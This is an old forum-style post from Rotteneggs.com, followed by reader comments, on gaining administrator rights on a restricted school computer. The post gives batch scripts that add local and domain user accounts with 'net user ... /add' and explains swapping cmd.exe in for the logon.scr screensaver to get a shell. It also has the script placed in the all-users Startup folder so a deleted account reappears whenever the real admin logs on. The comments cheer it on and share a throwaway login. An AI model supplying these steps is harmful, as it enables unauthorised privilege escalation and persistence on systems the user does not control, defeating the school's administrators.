Admin rights on a school computer the l33t way
|
|
| DO NOT TRY THIS AT HOME : Rotteneggs.com text files and message bases are for INFORMATIONAL PURPOSES ONLY. DO NOT undertake any project based upon any information obtained from this or any other web site.We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site. |
|
|
|
(73 votes) Published: May 16, 2006 12:36 p.m. In 10 Favorites Lists Viewed 2578 times |
Ok so your unable to Access Programs such as:
-Registry editor
-TaskManager
-Control Panel
-System Tray
-Other Unmentioned Admin tools
Well I am assuming that you can atleast do the following:
-Change Background
-Save a File
-Execute a File (simple ones like word processing and stuff)
-Login (doens’t matter what privilages
-Go to start -> run -> cmd or anyother way access the Command prompt (optional)
-----------------------
1) Open Notepad and type in the Following:
Code:
@echo off
cd..
cd..
cd..
cd..
cd..
net user Username Password /add
exit
2) Save it as Tool.bat then execute it (don’t be noobish and not change Username and Password which by the way are your DESIRED User and Pass).
Assuming that the last one worked, and you want to add a user that is accessible anywhere on the network, You MUST have a network domain, lets assume that "368" is the Domain name.
3) Same as before just open notepad and type:
Code:
@echo off
cd..
cd..
cd..
cd..
cd..
net user Username Password /add /domain
exit
4)Save it as Tool2.bat then execute it (don’t be noobish and not change Username and Password which by the way are your DESIRED User and Pass).
As you can see, the only difference is that i added the "/domain" syntax.
Now assuming that the last two ways failed Due to Cmd still being blocked. lets try calling the command prompt through the Screensaver, yes screensaver.
5) Find the file called cmd.exe, and rename it to logon.scr, next go into C:\Windows\system32 and find the file called logon.scr, rename it to logon.scr.bak and out ur copy of logon.scr to that folder.
5a) Simply wait for the screensaver to come up, it will be the Command prompt
now just do these commands:
Code:
cd..
cd..
cd..
cd..
net user Username Password /add
exit5b) Same way u can add your admin account to the domain:
Code:
cd..
cd..
cd..
cd..
net user Username Password /add /domain
exit-----------------------------------
Ok next way,
6) simply save the bat file in the startup folder for all users, in:
Code:
C:\Documents and settings\all users\ sumthing i can’t remember the path, but this will make the .bat file run everytime the admin logs on
and the commands will run as if the Admin himself would input those commands.
Note: this is especially useful if ur account gets caught and deleted because it will get created next time the Admin logs on anyways.
hopefully some of you understand this, I do perfectly well... but then agian I am considered computer smart =P
Thanks |
|
|
|

 | May 16, 2006 12:47 pm - wow, complicated. 5* |

 | May 16, 2006 12:47 pm - wtf, you have another egg the same as this
http://www.a.rottene gs.com/r3/show/se/185437.h ml |

 | May 16, 2006 12:57 pm - *sigh* Yes I know, unfournatly the other one was accidental, I didn’t think this one went through. Is it possible for me to delete the egg?
Thanks |

 | ay 16, 2006 1:00 pm - Yes, just go on to the egg, click edit page then goto the bottom and delete it |

 | May 16, 2006 1:04 pm - Thanks Thanks I just deleted it |

 | May 16, 2006 1:08 pm - ok, no prob |

 | May 16, 2006 1:50 pm - user= bugmenot@dodgeit.com
pass dodgeit |

 | May 16, 2006 3:17 pm - this is sooo old |

 | May 16, 2006 3:46 pm - if you have a egg the same as this then why did you post it again???? |

 | May 16, 2006 3:48 pm - o* |

 | May 16, 2006 4:25 pm - it was a "double post" he pressed refresh and it sent the info again.
4* this better work! |

 | May 16, 2006 10:05 pm -
o rly? mind posting a link then... |

 | May 21, 2006 5:45 pm -
Quote: Find the file called cmd.exe, and rename it to logon.scr where would this be? |

 | May 27, 2006 9:57 am - C:\WINDOWS\system32
That where cmd is |

 | Jul 03, 2006 7:25 pm - I understand it 80%, 5*****. |

 | Aug 15, 2006 5:00 pm - nice but there is an easyer way to hack a windows computer i would post an egg on it but i dont have enough points so until then 4* |

 | Aug 24, 2006 1:08 pm - 5* |

 | Jan 24, 2007 8:08 pm - hey man wat if i cant get into c:\\ folder then wat do i do |

 | Feb 10, 2007 11:45 am - or right click on the start menu select properties and check administrative tools |

 | Mar 12, 2007 1:02 pm - i give it a 5* because i tryed creating a user by using C:>net user....... the code goes through but it never lets me log into the name so ill try this trick... | |
|